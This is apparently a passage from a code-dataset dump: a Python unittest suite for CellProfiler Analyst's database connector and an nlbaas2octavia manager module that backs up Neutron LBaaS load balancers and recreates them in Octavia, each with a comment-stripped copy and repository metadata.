assert cols[:20] == ['TableNumber', 'ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY', 'Nuclei_Children_Cells_Count', 'Nuclei_Correlation_Correlation_DNA_and_pH3', 'Nuclei_Correlation_Correlation_DNA_and_Actin', 'Nuclei_Correlation_Correlation_pH3_and_Actin', 'Nuclei_AreaShape_Area', 'Nuclei_AreaShape_Eccentricity', 'Nuclei_AreaShape_Solidity', 'Nuclei_AreaShape_Extent', 'Nuclei_AreaShape_Euler_number', 'Nuclei_AreaShape_Perimeter', 'Nuclei_AreaShape_Form_factor', 'Nuclei_AreaShape_MajorAxisLength', 'Nuclei_AreaShape_MinorAxisLength', 'Nuclei_AreaShape_Orientation', 'Nuclei_AreaShape_Zernike0_0']
assert cols[-20:] == ['AreaNormalized_Cytoplasm_AreaShape_Zernike5_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike5_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_8', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_9']
def test_GetColumnTypes(self):
self.setup_mysql()
cols = self.db.GetColumnTypes(self.p.object_table)
assert cols[:19] == [int, int, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float]
assert cols[-20:] == [float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float]
cols = self.db.GetColumnTypes(self.p.image_table)
assert cols[:20] == [int, int, int, str, int, str, str, str, str, str, str, float, float, float, float, float, float, float, float, float]
def test_GetColnamesForClassifier(self):
self.setup_mysql()
cols = self.db.GetColnamesForClassifier()
for c in ['ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY']:
assert c not in cols
self.setup_sqlite()
cols = self.db.GetColnamesForClassifier()
for c in ['TableNumber', 'ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY']:
assert c not in cols
def test_ReadExportToDB(self):
'''Test reading data from Export to Database.'''
self.setup_sqlite2()
vals = [(1,), (2,), (3,), (4,), (5,), (6,), (7,), (8,), (9,), (10,), (11,), (12,), (13,), (14,), (15,), (16,), (17,), (18,), (19,), (20,)]
groups = {'Plate+Well': {('Week1_22123', 'B05'): [(13,), (14,), (15,), (16,)], ('Week1_22123', 'B02'): [(1,), (2,), (3,), (4,)], ('Week1_22123', 'B04'): [(9,), (10,), (11,), (12,)], ('Week1_22123', 'B06'): [(17,), (18,), (19,), (20,)], ('Week1_22123', 'B03'): [(5,), (6,), (7,), (8,)]}}, {'Plate+Well': ['Image_Metadata_Plate_DAPI', 'Image_Metadata_Well_DAPI']}
assert len(self.db.GetAllImageKeys())==20
assert self.db.GetAllImageKeys() == vals
assert self.db.GetGroupMaps(True) == groups
def test_CreateMySQLTempTableFromData(self):
self.setup_mysql()
data = [['A01', 1, 1.],
['A02', 1, 2.],
['A03', 1, -np.inf],
['A04', 1, np.inf],
['A04', 1, np.nan],
['A04', 1, 100],
['A04', 1, 200],
]
colnames = ['well', 'plate', 'vals']
self.db.CreateTableFromData(data, colnames, '__test_table', temporary=True)
res = self.db.execute('select * from __test_table')
assert res==[('A01', 1, 1.0), ('A02', 1, 2.0), ('A03', 1, None), ('A04', 1, None), ('A04', 1, None), ('A04', 1, 100.0), ('A04', 1, 200.0)]
def test_CreateSQLiteTempTableFromData(self):
self.setup_sqlite()
data = [['A01', 1, 1.],
['A02', 1, 2.],
['A03', 1, -np.inf],
['A04', 1, np.inf],
['A04', 1, np.nan],
['A04', 1, 100],
['A04', 1, 200],
]
colnames = ['well', 'plate', 'vals']
self.db.CreateTableFromData(data, colnames, '__test_table', temporary=True)
res = self.db.execute('select * from __test_table')
assert res==[('A01', 1, 1.0), ('A02', 1, 2.0), ('A03', 1, None), ('A04', 1, None), ('A04', 1, None), ('A04', 1, 100.0), ('A04', 1, 200.0)]
if __name__ == '__main__':
unittest.main()
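# The suite above assumes the CPAnalyst_test_data properties files (and the
# MySQL/SQLite databases they describe) exist two directories up, as in the
# setup_* methods; e.g. run with: python -m unittest cpa.tests.testdbconnect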
| 54.386525
| 1,009
| 0.637413
|
import unittest
from cpa.dbconnect import *
from cpa.properties import Properties
class TestDBConnect(unittest.TestCase):
def setup_mysql(self):
self.p = Properties()
self.db = DBConnect()
self.db.Disconnect()
self.p.LoadFile('../../CPAnalyst_test_data/nirht_test.properties')
def setup_sqlite(self):
self.p = Properties()
self.db = DBConnect()
self.db.Disconnect()
self.p.LoadFile('../../CPAnalyst_test_data/nirht_local.properties')
def setup_sqlite2(self):
self.p = Properties()
self.db = DBConnect()
self.db.Disconnect()
self.p.LoadFile('../../CPAnalyst_test_data/export_to_db_test.properties')
def test_clean_up_colnames(self):
self.setup_mysql()
def test_well_key_columns(self):
self.setup_mysql()
assert well_key_columns() == ('plate', 'well')
self.setup_sqlite()
assert well_key_columns() == tuple()
def test_image_key_columns(self):
self.setup_mysql()
assert image_key_columns() == ('ImageNumber',)
self.setup_sqlite()
assert image_key_columns() == ('TableNumber','ImageNumber')
def test_object_key_columns(self):
self.setup_mysql()
assert object_key_columns() == ('ImageNumber','ObjectNumber')
self.setup_sqlite()
assert object_key_columns() == ('TableNumber', 'ImageNumber','ObjectNumber')
def test_GetWhereClauseForObjects(self):
self.setup_mysql()
assert GetWhereClauseForObjects([(1,1)]) == '(ImageNumber=1 AND ObjectNumber=1)'
assert GetWhereClauseForObjects([(1,1), (2,1)]) == '(ImageNumber=1 AND ObjectNumber=1 OR ImageNumber=2 AND ObjectNumber=1)'
self.setup_sqlite()
assert GetWhereClauseForObjects([(0,1,1), (0,2,1)]) == '(TableNumber=0 AND ImageNumber=1 AND ObjectNumber=1 OR TableNumber=0 AND ImageNumber=2 AND ObjectNumber=1)'
def test_GetWhereClauseForImages(self):
self.setup_mysql()
assert GetWhereClauseForImages([(1,)]) == 'ImageNumber IN (1)'
assert GetWhereClauseForImages([(1,), (2,)]) == 'ImageNumber IN (1,2)'
self.setup_sqlite()
assert GetWhereClauseForImages([(0,1), (0,2)]) == '(TableNumber=0 AND ImageNumber IN (1,2))'
def test_UniqueObjectClause(self):
self.setup_mysql()
assert UniqueObjectClause() == 'ImageNumber,ObjectNumber'
self.setup_sqlite()
assert UniqueObjectClause() == 'TableNumber,ImageNumber,ObjectNumber'
def test_UniqueImageClause(self):
self.setup_mysql()
assert UniqueImageClause() == 'ImageNumber'
self.setup_sqlite()
assert UniqueImageClause() == 'TableNumber,ImageNumber'
def test_Connect_Disconnect(self):
self.setup_mysql()
self.db.connect()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.connect()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.Disconnect()
assert len(self.db.connections)==0
assert len(self.db.cursors)==0
assert len(self.db.connectionInfo)==0
self.setup_sqlite()
assert len(self.db.connections)==0
assert len(self.db.cursors)==0
assert len(self.db.connectionInfo)==0
self.db.GetAllImageKeys()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.GetAllImageKeys()
assert len(self.db.connections)==1
assert len(self.db.cursors)==1
assert len(self.db.connectionInfo)==1
self.db.Disconnect()
assert len(self.db.connections)==0
assert len(self.db.cursors)==0
assert len(self.db.connectionInfo)==0
def test_Commit(self):
self.setup_mysql()
self.db.connect()
self.db.execute('DROP TABLE IF EXISTS temp_test')
self.db.execute('CREATE TABLE temp_test (id int(11) default NULL)')
self.db.execute('INSERT INTO temp_test values(1)')
self.db.Commit()
self.db.Disconnect()
self.db.connect()
res = self.db.execute('SELECT id FROM temp_test WHERE id=1')
assert res == [(1,)]
self.db.execute('DROP TABLE temp_test')
def test_execute(self):
self.setup_mysql()
self.db.execute('SELECT %s FROM %s'%(self.p.image_id,self.p.image_table))
self.setup_sqlite()
self.db.execute('SELECT %s FROM %s'%(self.p.image_id,self.p.image_table))
def test_GetObjectIDAtIndex(self):
self.setup_mysql()
obKey = self.db.GetObjectIDAtIndex(imKey=(1,), index=94)
assert obKey==(1,94)
self.setup_sqlite()
obKey = self.db.GetObjectIDAtIndex(imKey=(0,1), index=94)
assert obKey==(0,1,94)
def test_GetPerImageObjectCounts(self):
self.setup_mysql()
self.db.GetPerImageObjectCounts()
self.setup_sqlite()
self.db.GetPerImageObjectCounts()
def test_GetObjectCoords(self):
self.setup_mysql()
xy = self.db.GetObjectCoords((1,1))
assert xy==(11.4818, 305.06400000000002)
self.setup_sqlite()
xy = self.db.GetObjectCoords((0,1,1))
assert xy==(11.4818, 305.06400000000002)
def test_GetObjectNear(self):
self.setup_mysql()
obKey = self.db.GetObjectNear((1,), 11, 300)
assert obKey == (1,1)
self.setup_sqlite()
obKey = self.db.GetObjectNear((0,1), 11, 300)
assert obKey == (0,1,1)
def test_GetFullChannelPathsForImage(self):
self.setup_mysql()
paths = self.db.GetFullChannelPathsForImage((1,))
assert paths==['2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d2.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d1.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d0.DIB']
self.setup_sqlite()
paths = self.db.GetFullChannelPathsForImage((0,1))
assert paths==['2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d2.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d1.DIB',
'2006_02_15_NIRHT/trcHT29Images/NIRHTa+001/AS_09125_050116000001_A01f00d0.DIB']
def test_GetGroupMaps(self):
self.setup_mysql()
groupMaps, colNames = self.db.GetGroupMaps()
assert groupMaps['Gene'][(1,)] == ('Gabra3',)
assert groupMaps['Well'][(1,)] == (1,)
assert groupMaps['Well+Gene'][(1,)] == (1, 'Gabra3')
assert colNames == {'Gene': ['gene'], 'Well': ['well'], 'Well+Gene': ['well', 'gene']}
self.setup_sqlite()
groupMaps, colNames = self.db.GetGroupMaps()
assert groupMaps['96x4'][(0,1)] == (0,1)
assert colNames == {'96x4': ['T2', 'I2']}
def test_GetFilteredImages(self):
self.setup_mysql()
test = set(self.db.GetFilteredImages('MAPs'))
print(test)
vals = set([(239,), (21,), (32,), (197,), (86,), (23,), (61,), (72,), (213,), (222,), (63,), (229,), (221,), (38,), (224,), (231,), (13,), (24,), (78,), (214,), (15,), (223,), (53,), (64,), (246,), (55,), (93,), (232,), (30,), (206,), (95,), (215,), (5,), (16,), (70,), (7,), (45,), (56,), (238,), (198,), (47,), (207,), (85,), (96,), (22,), (87,), (253,), (8,), (62,), (254,), (255,), (199,), (37,), (48,), (205,), (230,), (208,), (39,), (77,), (88,), (14,), (79,), (245,), (256,), (54,), (247,), (29,), (40,), (94,), (31,), (240,), (69,), (80,), (6,), (216,), (71,), (237,), (248,), (200,), (46,)])
assert test == vals
assert self.db.GetFilteredImages('IMPOSSIBLE') == []
self.setup_sqlite()
assert self.db.GetFilteredImages('FirstTen') == [(0,1),(0,2),(0,3),(0,4),(0,5),(0,6),(0,7),(0,8),(0,9),(0,10)]
assert self.db.GetFilteredImages('IMPOSSIBLE') == []
def test_GetColumnNames(self):
self.setup_mysql()
cols = self.db.GetColumnNames(self.p.object_table)
assert cols[:19] == ['ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY', 'Nuclei_Children_Cells_Count', 'Nuclei_Correlation_Correlation_DNA_and_pH3', 'Nuclei_Correlation_Correlation_DNA_and_Actin', 'Nuclei_Correlation_Correlation_pH3_and_Actin', 'Nuclei_AreaShape_Area', 'Nuclei_AreaShape_Eccentricity', 'Nuclei_AreaShape_Solidity', 'Nuclei_AreaShape_Extent', 'Nuclei_AreaShape_Euler_number', 'Nuclei_AreaShape_Perimeter', 'Nuclei_AreaShape_Form_factor', 'Nuclei_AreaShape_MajorAxisLength', 'Nuclei_AreaShape_MinorAxisLength', 'Nuclei_AreaShape_Orientation', 'Nuclei_AreaShape_Zernike0_0']
assert cols[-20:] == ['AreaNormalized_Cytoplasm_AreaShape_Zernike5_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike5_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_8', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_9']
self.setup_sqlite()
cols = self.db.GetColumnNames(self.p.object_table)
assert cols[:20] == ['TableNumber', 'ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY', 'Nuclei_Children_Cells_Count', 'Nuclei_Correlation_Correlation_DNA_and_pH3', 'Nuclei_Correlation_Correlation_DNA_and_Actin', 'Nuclei_Correlation_Correlation_pH3_and_Actin', 'Nuclei_AreaShape_Area', 'Nuclei_AreaShape_Eccentricity', 'Nuclei_AreaShape_Solidity', 'Nuclei_AreaShape_Extent', 'Nuclei_AreaShape_Euler_number', 'Nuclei_AreaShape_Perimeter', 'Nuclei_AreaShape_Form_factor', 'Nuclei_AreaShape_MajorAxisLength', 'Nuclei_AreaShape_MinorAxisLength', 'Nuclei_AreaShape_Orientation', 'Nuclei_AreaShape_Zernike0_0']
assert cols[-20:] == ['AreaNormalized_Cytoplasm_AreaShape_Zernike5_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike5_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike6_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike7_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_0', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_2', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_4', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_6', 'AreaNormalized_Cytoplasm_AreaShape_Zernike8_8', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_1', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_3', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_5', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_7', 'AreaNormalized_Cytoplasm_AreaShape_Zernike9_9']
def test_GetColumnTypes(self):
self.setup_mysql()
cols = self.db.GetColumnTypes(self.p.object_table)
assert cols[:19] == [int, int, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float]
assert cols[-20:] == [float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float, float]
cols = self.db.GetColumnTypes(self.p.image_table)
assert cols[:20] == [int, int, int, str, int, str, str, str, str, str, str, float, float, float, float, float, float, float, float, float]
def test_GetColnamesForClassifier(self):
self.setup_mysql()
cols = self.db.GetColnamesForClassifier()
for c in ['ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY']:
assert c not in cols
self.setup_sqlite()
cols = self.db.GetColnamesForClassifier()
for c in ['TableNumber', 'ImageNumber', 'ObjectNumber', 'Nuclei_Location_CenterX', 'Nuclei_Location_CenterY']:
assert c not in cols
def test_ReadExportToDB(self):
self.setup_sqlite2()
vals = [(1,), (2,), (3,), (4,), (5,), (6,), (7,), (8,), (9,), (10,), (11,), (12,), (13,), (14,), (15,), (16,), (17,), (18,), (19,), (20,)]
groups = {'Plate+Well': {('Week1_22123', 'B05'): [(13,), (14,), (15,), (16,)], ('Week1_22123', 'B02'): [(1,), (2,), (3,), (4,)], ('Week1_22123', 'B04'): [(9,), (10,), (11,), (12,)], ('Week1_22123', 'B06'): [(17,), (18,), (19,), (20,)], ('Week1_22123', 'B03'): [(5,), (6,), (7,), (8,)]}}, {'Plate+Well': ['Image_Metadata_Plate_DAPI', 'Image_Metadata_Well_DAPI']}
assert len(self.db.GetAllImageKeys())==20
assert self.db.GetAllImageKeys() == vals
assert self.db.GetGroupMaps(True) == groups
def test_CreateMySQLTempTableFromData(self):
self.setup_mysql()
data = [['A01', 1, 1.],
['A02', 1, 2.],
['A03', 1, -np.inf],
['A04', 1, np.inf],
['A04', 1, np.nan],
['A04', 1, 100],
['A04', 1, 200],
]
colnames = ['well', 'plate', 'vals']
self.db.CreateTableFromData(data, colnames, '__test_table', temporary=True)
res = self.db.execute('select * from __test_table')
assert res==[('A01', 1, 1.0), ('A02', 1, 2.0), ('A03', 1, None), ('A04', 1, None), ('A04', 1, None), ('A04', 1, 100.0), ('A04', 1, 200.0)]
def test_CreateSQLiteTempTableFromData(self):
self.setup_sqlite()
data = [['A01', 1, 1.],
['A02', 1, 2.],
['A03', 1, -np.inf],
['A04', 1, np.inf],
['A04', 1, np.nan],
['A04', 1, 100],
['A04', 1, 200],
]
colnames = ['well', 'plate', 'vals']
self.db.CreateTableFromData(data, colnames, '__test_table', temporary=True)
res = self.db.execute('select * from __test_table')
assert res==[('A01', 1, 1.0), ('A02', 1, 2.0), ('A03', 1, None), ('A04', 1, None), ('A04', 1, None), ('A04', 1, 100.0), ('A04', 1, 200.0)]
if __name__ == '__main__':
unittest.main()
| true
| true
|
1c490fef6fa62645dca9cb9109b50fc4d89a7c7c
| 12,196
|
py
|
Python
|
nlbaas2octavia_lb_replicator/manager.py
|
johanssone/nlbaas2octavia-lb-replicator
|
3b49d48132c172d8b6c8d3ec529da0bc224788cb
|
[
"Apache-2.0"
] | null | null | null |
nlbaas2octavia_lb_replicator/manager.py
|
johanssone/nlbaas2octavia-lb-replicator
|
3b49d48132c172d8b6c8d3ec529da0bc224788cb
|
[
"Apache-2.0"
] | null | null | null |
nlbaas2octavia_lb_replicator/manager.py
|
johanssone/nlbaas2octavia-lb-replicator
|
3b49d48132c172d8b6c8d3ec529da0bc224788cb
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Nir Magnezi
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import neutronclient
from pprint import pprint
from nlbaas2octavia_lb_replicator.common import os_clients
from nlbaas2octavia_lb_replicator.common import utils
class Manager(object):
def __init__(self, lb_id):
self.os_clients = os_clients.OpenStackClients()
self._lb_id = lb_id
self._lb_fip = {}
self._lb_tree = {}
self._lb_details = {}
self._lb_listeners = {}
self._lb_pools = {}
self._lb_def_pool_ids = []
self._lb_healthmonitors = {}
self._lb_members = {}
def _pools_deep_scan(self, pools_list):
for pool in pools_list:
pool_id = pool['id']
lb_pool = self.os_clients.neutronclient.show_lbaas_pool(pool_id)
self._lb_pools[pool_id] = lb_pool
if pool.get('healthmonitor'):
# Health monitor is optional
healthmonitor_id = pool['healthmonitor']['id']
lb_healthmonitor = (
self.os_clients.neutronclient
.show_lbaas_healthmonitor(healthmonitor_id)['healthmonitor']
)
self._lb_healthmonitors[healthmonitor_id] = lb_healthmonitor
for member in pool['members']:
member_id = member['id']
lb_member = (
self.os_clients.neutronclient
.show_lbaas_member(member_id, pool_id)
)
self._lb_members[member_id] = lb_member
def collect_lb_info_from_api(self):
self._lb_tree = (
self.os_clients.neutronclient.retrieve_loadbalancer_status(
loadbalancer=self._lb_id)
)
self._lb_details = self.os_clients.neutronclient.show_loadbalancer(
self._lb_id)
fips = self.os_clients.neutronclient.list_floatingips(
port_id=self._lb_details['loadbalancer']['vip_port_id']
).get('floatingips')
if fips:
self._lb_fip = fips[0]
# Scan lb_tree and retrieve all objects to back up the info
# that the tree is missing; the Octavia lb tree contains more details.
for listener in (
self._lb_tree['statuses']['loadbalancer']['listeners']):
listener_id = listener['id']
lb_listener = (
self.os_clients.neutronclient.show_listener(listener_id)
)
self._lb_listeners[listener_id] = lb_listener
self._pools_deep_scan(listener['pools'])
# NOTE(mnaser): If there are no pools, the pools value can be empty,
# so we try to get a default value.
pools = self._lb_tree['statuses']['loadbalancer'].get('pools', [])
self._pools_deep_scan(pools)
def write_lb_data_file(self, filename):
self._lb_pools = self.fix_duplicate_pool_names(self._lb_pools)
lb_data = {
'lb_id': self._lb_id,
'lb_fip': self._lb_fip,
'lb_tree': self._lb_tree,
'lb_details': self._lb_details,
'lb_listeners': self._lb_listeners,
'lb_pools': self._lb_pools,
'lb_healthmonitors': self._lb_healthmonitors,
'lb_members': self._lb_members
}
with open(filename, 'w') as f:
json.dump(lb_data, f, sort_keys=True, indent=4)
def read_lb_data_file(self, filename):
# Read load balancer data from a local JSON file.
with open(filename) as f:
lb_data = json.load(f)
try:
if self._lb_id == lb_data['lb_id']:
self._lb_fip = lb_data['lb_fip']
self._lb_tree = lb_data['lb_tree']
self._lb_details = lb_data['lb_details']
self._lb_listeners = lb_data['lb_listeners']
self._lb_pools = lb_data['lb_pools']
self._lb_healthmonitors = lb_data['lb_healthmonitors']
self._lb_members = lb_data['lb_members']
except ValueError:
print('The file content does not match the lb_id you specified')
def fix_duplicate_pool_names(self, lb_pools):
rev_dict = {}
for k, v in lb_pools.items():
rev_dict.setdefault(v['pool']['name'], set()).add(k)
duplicates = []
for key, values in rev_dict.items():
if len(values) > 1:
duplicates.append({key: values})
for dup in duplicates:
for k, v in dup.items():
count = 1
for ids in v:
lb_pools[ids]['pool']['name'] = "{}_{}".format(k, count)
count += 1
return lb_pools
def _build_healthmonitor_obj(self, pool_id):
nlbaas_pool_data = self._lb_pools[pool_id]['pool']
octavia_hm = None
if nlbaas_pool_data.get('healthmonitor_id'):
healthmonitor_id = nlbaas_pool_data['healthmonitor_id']
healthmonitor_data = self._lb_healthmonitors[healthmonitor_id]
octavia_hm = {
'type': healthmonitor_data.get('type'),
'delay': healthmonitor_data.get('delay'),
'expected_codes': healthmonitor_data.get('expected_codes'),
'http_method': healthmonitor_data.get('http_method'),
'max_retries': healthmonitor_data.get('max_retries'),
'timeout': healthmonitor_data.get('timeout'),
'url_path': healthmonitor_data.get('url_path')
}
return octavia_hm
def _build_members_list(self, pool_id):
nlbaas_pool_data = self._lb_pools[pool_id]['pool']
octavia_lb_members = []
for member in nlbaas_pool_data['members']:
member_id = member['id']
member_data = self._lb_members[member_id]['member']
octavia_member = {
'admin_state_up': member_data['admin_state_up'],
'name': member_data['name'],
'address': member_data['address'],
'protocol_port': member_data['protocol_port'],
'subnet_id': member_data['subnet_id'],
'weight': member_data['weight']
}
octavia_lb_members.append(octavia_member)
return octavia_lb_members
def _build_listeners_list(self):
nlbaas_lb_tree = self._lb_tree['statuses']['loadbalancer']
octavia_lb_listeners = []
for listener in nlbaas_lb_tree['listeners']:
listener_id = listener['id']
nlbaas_listener_data = self._lb_listeners[listener_id]['listener']
default_pool = None
pool_id = nlbaas_listener_data['default_pool_id']
if pool_id is not None and pool_id not in self._lb_def_pool_ids:
self._lb_def_pool_ids.append(pool_id)
nlbaas_default_pool_data = \
self._lb_pools[pool_id]['pool']
default_pool_name = "legacy-%s" % nlbaas_default_pool_data['id']
if nlbaas_default_pool_data['name']:
default_pool_name = nlbaas_default_pool_data['name']
default_pool = {
'name': default_pool_name,
'protocol': nlbaas_default_pool_data['protocol'],
'lb_algorithm': nlbaas_default_pool_data['lb_algorithm'],
'healthmonitor': self._build_healthmonitor_obj(pool_id) or '',
'members': self._build_members_list(pool_id) or '',
}
listener_name = nlbaas_listener_data['name']
if not listener_name:
listener_name = "listener-%s" % nlbaas_listener_data['id']
octavia_listener = {
'name': listener_name,
'protocol': nlbaas_listener_data['protocol'],
'protocol_port': nlbaas_listener_data['protocol_port'],
'default_pool': default_pool,
}
octavia_lb_listeners.append(octavia_listener)
return octavia_lb_listeners
def _build_pools_list(self):
nlbaas_lb_tree = self._lb_tree['statuses']['loadbalancer']
octavia_lb_pools = []
for pool in nlbaas_lb_tree.get('pools', []):
pool_id = pool['id']
if pool_id in self._lb_def_pool_ids:
continue
else:
nlbaas_pool_data = self._lb_pools[pool_id]['pool']
pool_name = nlbaas_pool_data['name']
if not pool_name:
pool_name = "pool-%s" % nlbaas_pool_data['id']
octavia_pool = {
'name': pool_name,
'description': nlbaas_pool_data['description'],
'protocol': nlbaas_pool_data['protocol'],
'lb_algorithm': nlbaas_pool_data['lb_algorithm'],
'healthmonitor':
self._build_healthmonitor_obj(pool_id) or '',
'members': self._build_members_list(pool_id) or ''
}
octavia_lb_pools.append(octavia_pool)
return octavia_lb_pools
def build_octavia_lb_tree(self, reuse_vip):
nlbaas_lb_details = self._lb_details['loadbalancer']
octavia_lb_tree = {
'loadbalancer': {
'name': nlbaas_lb_details['name'],
'description': nlbaas_lb_details['description'],
'admin_state_up': nlbaas_lb_details['admin_state_up'],
'project_id': nlbaas_lb_details['tenant_id'],
'flavor_id': '',
'listeners': self._build_listeners_list(),
'pools': self._build_pools_list(),
'vip_subnet_id': nlbaas_lb_details['vip_subnet_id'],
'vip_address': nlbaas_lb_details['vip_address']
if reuse_vip else ''
}
}
utils._remove_empty(octavia_lb_tree)
return octavia_lb_tree
def octavia_load_balancer_create(self, reuse_vip):
# Delete all health monitors
for healthmonitor_id, healthmonitor_data in self._lb_healthmonitors.items():
try:
self.os_clients.neutronclient.delete_lbaas_healthmonitor(healthmonitor_id)
except neutronclient.common.exceptions.NotFound:
pass
# Delete all pools
for pool_id, pool_data in self._lb_pools.items():
try:
self.os_clients.neutronclient.delete_lbaas_pool(pool_id)
except neutronclient.common.exceptions.NotFound:
pass
# Delete all listeners
for listener_id, listener_data in self._lb_listeners.items():
try:
self.os_clients.neutronclient.delete_listener(listener_id)
except neutronclient.common.exceptions.NotFound:
pass
# Delete loadbalancer
try:
self.os_clients.neutronclient.delete_loadbalancer(self._lb_id)
except neutronclient.common.exceptions.NotFound:
pass
octavia_lb_tree = self.build_octavia_lb_tree(reuse_vip)
pprint(octavia_lb_tree)
new_lb = self.os_clients.octaviaclient.load_balancer_create(
json=octavia_lb_tree)
if self._lb_fip:
vip_port_id = new_lb['loadbalancer']['vip_port_id']
self.os_clients.neutronclient.update_floatingip(
self._lb_fip['id'],
{"floatingip": {"port_id": vip_port_id}}
)
pprint(new_lb)
pprint(self._lb_fip)
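# Hypothetical end-to-end usage sketch (the UUID and file name are made up):
#   manager = Manager('0f7b1d2e-0000-0000-0000-loadbalancer1')
#   manager.collect_lb_info_from_api()
#   manager.write_lb_data_file('lb_backup.json')  # keep a backup first
#   manager.octavia_load_balancer_create(reuse_vip=True)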
| 40.384106
| 90
| 0.589866
|
import json
import neutronclient
from pprint import pprint
from nlbaas2octavia_lb_replicator.common import os_clients
from nlbaas2octavia_lb_replicator.common import utils
class Manager(object):
def __init__(self, lb_id):
self.os_clients = os_clients.OpenStackClients()
self._lb_id = lb_id
self._lb_fip = {}
self._lb_tree = {}
self._lb_details = {}
self._lb_listeners = {}
self._lb_pools = {}
self._lb_def_pool_ids = []
self._lb_healthmonitors = {}
self._lb_members = {}
def _pools_deep_scan(self, pools_list):
for pool in pools_list:
pool_id = pool['id']
lb_pool = self.os_clients.neutronclient.show_lbaas_pool(pool_id)
self._lb_pools[pool_id] = lb_pool
if pool.get('healthmonitor'):
healthmonitor_id = pool['healthmonitor']['id']
lb_healthmonitor = (
self.os_clients.neutronclient
.show_lbaas_healthmonitor(healthmonitor_id)['healthmonitor']
)
self._lb_healthmonitors[healthmonitor_id] = lb_healthmonitor
for member in pool['members']:
